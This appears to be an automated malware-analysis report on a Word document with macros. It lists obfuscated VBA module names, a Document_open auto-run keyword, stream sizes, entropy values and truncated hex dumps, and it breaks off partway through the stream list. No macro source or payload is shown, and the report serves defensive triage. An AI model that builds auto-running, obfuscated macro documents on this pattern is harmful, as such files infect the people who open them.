                                            atDHBJx
                                            KXGTl
                                            "JpgcAFBJl.BluQGJBo.HLIdIFFcG"
                                            NXAzADuD
                                            "rMFaDBIH.tLIPEJ.hpnWBFGJ"
                                            gcygJGHEJ
                                            YxrfC
                                            XFEjEBSHJ
                                            "JdDRkqFq.LxQSvJIP.lkDUG"
                                            "aNPTEC.yoVhAA.FdUyoLiD"
                                            "zLHaBG.FJohjH.BGnEgEcBE"
                                            tzSIVA:
                                            abhpAG:
                                            "VvQCyHBA.dtCSGGyCG.ELwqFIJ"
                                            "wYRQDIH.fYeTVlIA.JTtGsGq"
                                            VczvEJEA
                                            "XxVUI.llKCOzCBB.sYhxmD"
                                            "OTrKFG.tIiOI.EVNCHhAE"
                                            "cRFcI.VXpPGO.JCphFj"
                                            kdcmxDAC
                                            wHzTDbw
                                            qYwhDUHUF:
                                            cLEdnSIFI
                                            Attribute
                                            Close
                                            wkxaA
                                            AyCGHCJA:
                                            bMnEJ:
                                            "ZCyVJoj.creOBB.daPhFoG"
                                            teqYIiCD
                                            nwGAclAy:
                                            KVVwHDdH
                                            wkxaA:
                                            fEgLs:
                                            "BvoseJVlC.DndgzH.mKMEEDrQr"
                                            aIrZTje
                                            MTyfRH
                                            "EaHweM.UDfoBCnv.OyqDF"
                                            RFpbBhv
                                            "vlJqH.UtTqAoBFI.ftWSDNJ"
                                            "jADhGiFIX.msdcqAi.XOHIAJ"
                                            VBA Code
                                            VBA File Name: J84qpb_vkjnc1hq, Stream Size: 1116
                                            General
                                            Stream Path:Macros/VBA/J84qpb_vkjnc1hq
                                            VBA File Name:J84qpb_vkjnc1hq
                                            Stream Size:1116
                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . u . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                            Data Raw:01 16 01 00 00 f0 00 00 00 de 02 00 00 d4 00 00 00 da 01 00 00 ff ff ff ff e5 02 00 00 75 03 00 00 00 00 00 00 01 00 00 00 cf ca 98 d1 00 00 ff ff a3 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                            VBA Code Keywords

                                            Keyword
                                            False
                                            Private
                                            VB_Exposed
                                            Attribute
                                            VB_Creatable
                                            VB_Name
                                            Document_open()
                                            VB_PredeclaredId
                                            VB_GlobalNameSpace
                                            VB_Base
                                            VB_Customizable
                                            VB_TemplateDerived
                                            VBA Code
                                            VBA File Name: Qtep_eof7eoc0a, Stream Size: 683
                                            General
                                            Stream Path:Macros/VBA/Qtep_eof7eoc0a
                                            VBA File Name:Qtep_eof7eoc0a
                                            Stream Size:683
                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . # . . . w . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                            Data Raw:01 16 01 00 00 f0 00 00 00 1c 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 23 02 00 00 77 02 00 00 00 00 00 00 01 00 00 00 cf ca db f8 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                            VBA Code Keywords

                                            Keyword
                                            Attribute
                                            VB_Name
                                            VBA Code
                                            VBA File Name: UserForm1, Stream Size: 1159
                                            General
                                            Stream Path:Macros/VBA/UserForm1
                                            VBA File Name:UserForm1
                                            Stream Size:1159
                                            Data ASCII:. . . . . . . . . @ . . . . . . . L . . . . . . . G . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                            Data Raw:01 16 01 00 00 f0 00 00 00 40 03 00 00 d4 00 00 00 4c 02 00 00 ff ff ff ff 47 03 00 00 9b 03 00 00 00 00 00 00 01 00 00 00 cf ca 17 e0 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                            VBA Code Keywords

                                            Keyword
                                            False
                                            VB_Exposed
                                            Attribute
                                            VB_Name
                                            VB_Creatable
                                            VB_PredeclaredId
                                            VB_GlobalNameSpace
                                            VB_Base
                                            VB_Customizable
                                            VB_TemplateDerived
                                            VBA Code
                                            VBA File Name: UserForm2, Stream Size: 1160
                                            General
                                            Stream Path:Macros/VBA/UserForm2
                                            VBA File Name:UserForm2
                                            Stream Size:1160
                                            Data ASCII:. . . . . . . . . @ . . . . . . . L . . . . . . . G . . . . . . . . . . . . . . . . . N K . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                            Data Raw:01 16 01 00 00 f0 00 00 00 40 03 00 00 d4 00 00 00 4c 02 00 00 ff ff ff ff 47 03 00 00 9b 03 00 00 00 00 00 00 01 00 00 00 cf ca 4e 4b 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                            VBA Code Keywords

                                            Keyword
                                            False
                                            VB_Exposed
                                            Attribute
                                            VB_Name
                                            VB_Creatable
                                            VB_PredeclaredId
                                            VB_GlobalNameSpace
                                            VB_Base
                                            VB_Customizable
                                            VB_TemplateDerived
                                            VBA Code
                                            VBA File Name: UserForm3, Stream Size: 1160
                                            General
                                            Stream Path:Macros/VBA/UserForm3
                                            VBA File Name:UserForm3
                                            Stream Size:1160
                                            Data ASCII:. . . . . . . . . @ . . . . . . . L . . . . . . . G . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                            Data Raw:01 16 01 00 00 f0 00 00 00 40 03 00 00 d4 00 00 00 4c 02 00 00 ff ff ff ff 47 03 00 00 9b 03 00 00 00 00 00 00 01 00 00 00 cf ca c2 ba 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                            VBA Code Keywords

                                            Keyword
                                            False
                                            VB_Exposed
                                            Attribute
                                            VB_Name
                                            VB_Creatable
                                            VB_PredeclaredId
                                            VB_Base
                                            VB_Customizable
                                            VB_TemplateDerived
                                            VB_GlobalNameSpace
                                            VBA Code
                                            VBA File Name: UserForm4, Stream Size: 1160
                                            General
                                            Stream Path:Macros/VBA/UserForm4
                                            VBA File Name:UserForm4
                                            Stream Size:1160
                                            Data ASCII:. . . . . . . . . @ . . . . . . . L . . . . . . . G . . . . . . . . . . . . . . . . . . c . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                            Data Raw:01 16 01 00 00 f0 00 00 00 40 03 00 00 d4 00 00 00 4c 02 00 00 ff ff ff ff 47 03 00 00 9b 03 00 00 00 00 00 00 01 00 00 00 cf ca f5 63 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                            VBA Code Keywords

                                            Keyword
                                            False
                                            VB_Exposed
                                            Attribute
                                            VB_Name
                                            VB_Creatable
                                            VB_GlobalNameSpace
                                            VB_Base
                                            VB_Customizable
                                            VB_TemplateDerived
                                            VB_PredeclaredId
                                            VBA Code
                                            VBA File Name: UserForm5, Stream Size: 1160
                                            General
                                            Stream Path:Macros/VBA/UserForm5
                                            VBA File Name:UserForm5
                                            Stream Size:1160
                                            Data ASCII:. . . . . . . . . @ . . . . . . . L . . . . . . . G . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                            Data Raw:01 16 01 00 00 f0 00 00 00 40 03 00 00 d4 00 00 00 4c 02 00 00 ff ff ff ff 47 03 00 00 9b 03 00 00 00 00 00 00 01 00 00 00 cf ca 83 cc 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                            VBA Code Keywords

                                            Keyword
                                            False
                                            VB_Exposed
                                            Attribute
                                            VB_Name
                                            VB_Creatable
                                            VB_PredeclaredId
                                            VB_GlobalNameSpace
                                            VB_Base
                                            VB_Customizable
                                            VB_TemplateDerived
                                            VBA Code

                                            Streams

                                            Stream Path: \x1CompObj, File Type: data, Stream Size: 114
                                            General
                                            Stream Path:\x1CompObj
                                            File Type:data
                                            Stream Size:114
                                            Entropy:4.2359563651
                                            Base64 Encoded:True
                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . M i c r o s o f t W o r d 9 7 - 2 0 0 3 D o c u m e n t . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q . . . . . . . . . . . .
                                            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 20 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 57 6f 72 64 20 39 37 2d 32 30 30 33 20 44 6f 63 75 6d 65 6e 74 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                            Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                            General
                                            Stream Path:\x5DocumentSummaryInformation
                                            File Type:data
                                            Stream Size:4096
                                            Entropy:0.251933307426
                                            Base64 Encoded:False
                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . h . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 e8 00 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 70 00 00 00 05 00 00 00 7c 00 00 00 06 00 00 00 84 00 00 00 11 00 00 00 8c 00 00 00 17 00 00 00 94 00 00 00 0b 00 00 00 9c 00 00 00 10 00 00 00 a4 00 00 00 13 00 00 00 ac 00 00 00
                                            Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 548
                                            General
                                            Stream Path:\x5SummaryInformation
                                            File Type:data
                                            Stream Size:548
                                            Entropy:4.13263574365
                                            Base64 Encoded:False
                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . t . . . . . . . X . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . 0 . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . N o r m a l . d o t m .
                                            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 f4 01 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 74 01 00 00 04 00 00 00 58 01 00 00 05 00 00 00 a4 00 00 00 06 00 00 00 b0 00 00 00 07 00 00 00 bc 00 00 00 08 00 00 00 40 01 00 00 09 00 00 00 d0 00 00 00
                                            Stream Path: 1Table, File Type: data, Stream Size: 7215
                                            General
                                            Stream Path:1Table
                                            File Type:data
                                            Stream Size:7215
                                            Entropy:5.85763392146
                                            Base64 Encoded:True
                                            Data ASCII:. . . . . . . . s . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . .
                                            Data Raw:0a 06 0f 00 12 00 01 00 73 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00
                                            Stream Path: Data, File Type: data, Stream Size: 99191
                                            General
                                            Stream Path:Data
                                            File Type:data
                                            Stream Size:99191
                                            Entropy:7.38970982064
                                            Base64 Encoded:True
                                            Data ASCII:w . . . D . d . . . . . . . . . . . . . . . . . . . . . / g . , b . r . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . j . . . . . . . . . . . . . . . . . . . c . . . 8 . . . . A . . . . ? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . i . c . t . u . r . e . . 1 . . . . . " . . . . . . . . . . . . . . . . . . . . . . . R . . . . . . . . . @ " . c . . . 7 . . . @ . . . . . . . . . . . . . . D . . . . . . . . F . . . . . . @ " . c . . . 7 . . . @ . . . . . . . . . .
                                            Data Raw:77 83 01 00 44 00 64 00 00 00 00 00 00 00 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 2f 67 eb 2c 62 01 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 04 f0 6a 00 00 00 b2 04 0a f0 08 00 00 00 01 04 00 00 00 0a 00 00 63 00 0b f0 38 00 00 00 04 41 01 00 00 00 3f 01 00 00 06 00 bf 01 00 00 10 00 ff 01 00 00 08 00 80 c3 14 00
                                            Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 910
                                            General
                                            Stream Path:Macros/PROJECT
                                            File Type:ASCII text, with CRLF line terminators
                                            Stream Size:910
                                            Entropy:5.34567175306
                                            Base64 Encoded:True
                                            Data ASCII:I D = " { 2 B 5 2 F 1 0 A - F 9 0 7 - 4 C 0 0 - 8 F 9 B - 6 A 7 0 4 B B 5 A 8 9 B } " . . D o c u m e n t = J 8 4 q p b _ v k j n c 1 h q / & H 0 0 0 0 0 0 0 0 . . P a c k a g e = { A C 9 F 2 F 9 0 - E 8 7 7 - 1 1 C E - 9 F 6 8 - 0 0 A A 0 0 5 7 4 A 4 F } . . B a s e C l a s s = U s e r F o r m 1 . . B a s e C l a s s = U s e r F o r m 2 . . B a s e C l a s s = U s e r F o r m 3 . . B a s e C l a s s = U s e r F o r m 4 . . B a s e C l a s s = U s e r F o r m 5 . . M o d u l e = E 2 a j b o 3 k w z k a _ d
                                            Data Raw:49 44 3d 22 7b 32 42 35 32 46 31 30 41 2d 46 39 30 37 2d 34 43 30 30 2d 38 46 39 42 2d 36 41 37 30 34 42 42 35 41 38 39 42 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 4a 38 34 71 70 62 5f 76 6b 6a 6e 63 31 68 71 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 50 61 63 6b 61 67 65 3d 7b 41 43 39 46 32 46 39 30 2d 45 38 37 37 2d 31 31 43 45 2d 39 46 36 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d
                                            Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 296
                                            General
                                            Stream Path:Macros/PROJECTwm
                                            File Type:data
                                            Stream Size:296
                                            Entropy:3.80617361515
                                            Base64 Encoded:False
                                            Data ASCII:J 8 4 q p b _ v k j n c 1 h q . J . 8 . 4 . q . p . b . _ . v . k . j . n . c . 1 . h . q . . . U s e r F o r m 1 . U . s . e . r . F . o . r . m . 1 . . . U s e r F o r m 2 . U . s . e . r . F . o . r . m . 2 . . . U s e r F o r m 3 . U . s . e . r . F . o . r . m . 3 . . . U s e r F o r m 4 . U . s . e . r . F . o . r . m . 4 . . . U s e r F o r m 5 . U . s . e . r . F . o . r . m . 5 . . . E 2 a j b o 3 k w z k a _ d 5 z . E . 2 . a . j . b . o . 3 . k . w . z . k . a . _ . d . 5 . z . . . Q t e p _ e o
                                            Data Raw:4a 38 34 71 70 62 5f 76 6b 6a 6e 63 31 68 71 00 4a 00 38 00 34 00 71 00 70 00 62 00 5f 00 76 00 6b 00 6a 00 6e 00 63 00 31 00 68 00 71 00 00 00 55 73 65 72 46 6f 72 6d 31 00 55 00 73 00 65 00 72 00 46 00 6f 00 72 00 6d 00 31 00 00 00 55 73 65 72 46 6f 72 6d 32 00 55 00 73 00 65 00 72 00 46 00 6f 00 72 00 6d 00 32 00 00 00 55 73 65 72 46 6f 72 6d 33 00 55 00 73 00 65 00 72 00 46 00
                                            Stream Path: Macros/UserForm1/\x1CompObj, File Type: data, Stream Size: 97
                                            General
                                            Stream Path:Macros/UserForm1/\x1CompObj
                                            File Type:data
                                            Stream Size:97
                                            Entropy:3.61064918306
                                            Base64 Encoded:False
                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
                                            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                            Stream Path: Macros/UserForm1/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 266
                                            General
                                            Stream Path:Macros/UserForm1/\x3VBFrame
                                            File Type:ASCII text, with CRLF line terminators
                                            Stream Size:266
                                            Entropy:4.62034133633
                                            Base64 Encoded:True
                                            Data ASCII:V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } U s e r F o r m 1 . . C a p t i o n = " U s e r F o r m 1 " . . C l i e n t H e i g h t = 3 0 1 5 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 6 5 . . C l i e n t W i d t h = 4 5 6 0 . . S t a r t U p P o s i t i o n = 1 ' C e n t e r O w
                                            Data Raw:56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 55 73 65 72 46 6f 72 6d 31 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 73 65 72 46 6f 72 6d 31 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69 67 68 74 20 20 20 20 3d 20
                                            Stream Path: Macros/UserForm1/f, File Type: data, Stream Size: 38
                                            General
                                            Stream Path:Macros/UserForm1/f
                                            File Type:data
                                            Stream Size:38
                                            Entropy:1.54052096453
                                            Base64 Encoded:False
                                            Data ASCII:. . . . . . . . . } . . k . . . . . . . . . . . . . . . . . . . . . . . . .
                                            Data Raw:00 04 18 00 00 0c 00 08 00 7d 00 00 6b 1f 00 00 c6 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                            Stream Path: Macros/UserForm1/o, File Type: empty, Stream Size: 0
                                            General
                                            Stream Path:Macros/UserForm1/o
                                            File Type:empty
                                            Stream Size:0
                                            Entropy:0.0
                                            Base64 Encoded:False
                                            Data ASCII:
                                            Data Raw:
                                            Stream Path: Macros/UserForm2/\x1CompObj, File Type: data, Stream Size: 97
                                            General
                                            Stream Path:Macros/UserForm2/\x1CompObj
                                            File Type:data
                                            Stream Size:97
                                            Entropy:3.61064918306
                                            Base64 Encoded:False
                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
                                            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                            Stream Path: Macros/UserForm2/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 266
                                            General
                                            Stream Path:Macros/UserForm2/\x3VBFrame
                                            File Type:ASCII text, with CRLF line terminators
                                            Stream Size:266
                                            Entropy:4.62970308443
                                            Base64 Encoded:True
                                            Data ASCII:V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } U s e r F o r m 2 . . C a p t i o n = " U s e r F o r m 2 " . . C l i e n t H e i g h t = 3 0 1 5 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 6 5 . . C l i e n t W i d t h = 4 5 6 0 . . S t a r t U p P o s i t i o n = 1 ' C e n t e r O w
                                            Data Raw:56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 55 73 65 72 46 6f 72 6d 32 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 73 65 72 46 6f 72 6d 32 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69 67 68 74 20 20 20 20 3d 20
                                            Stream Path: Macros/UserForm2/f, File Type: data, Stream Size: 38
                                            General
                                            Stream Path:Macros/UserForm2/f
                                            File Type:data
                                            Stream Size:38
                                            Entropy:1.54052096453
                                            Base64 Encoded:False
                                            Data ASCII:. . . . . . . . . } . . k . . . . . . . . . . . . . . . . . . . . . . . . .
                                            Data Raw:00 04 18 00 00 0c 00 08 00 7d 00 00 6b 1f 00 00 c6 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                            Stream Path: Macros/UserForm2/o, File Type: empty, Stream Size: 0
                                            General
                                            Stream Path:Macros/UserForm2/o
                                            File Type:empty
                                            Stream Size:0
                                            Entropy:0.0
                                            Base64 Encoded:False
                                            Data ASCII:
                                            Data Raw:
                                            Stream Path: Macros/UserForm3/\x1CompObj, File Type: data, Stream Size: 97
                                            General
                                            Stream Path:Macros/UserForm3/\x1CompObj
                                            File Type:data
                                            Stream Size:97
                                            Entropy:3.61064918306
                                            Base64 Encoded:False
                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
                                            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                            Stream Path: Macros/UserForm3/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 266
                                            General
                                            Stream Path:Macros/UserForm3/\x3VBFrame
                                            File Type:ASCII text, with CRLF line terminators
                                            Stream Size:266
                                            Entropy:4.63438395848
                                            Base64 Encoded:True
                                            Data ASCII:V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } U s e r F o r m 3 . . C a p t i o n = " U s e r F o r m 3 " . . C l i e n t H e i g h t = 3 0 1 5 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 6 5 . . C l i e n t W i d t h = 4 5 6 0 . . S t a r t U p P o s i t i o n = 1 ' C e n t e r O w
                                            Data Raw:56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 55 73 65 72 46 6f 72 6d 33 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 73 65 72 46 6f 72 6d 33 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69 67 68 74 20 20 20 20 3d 20
                                            Stream Path: Macros/UserForm3/f, File Type: data, Stream Size: 38
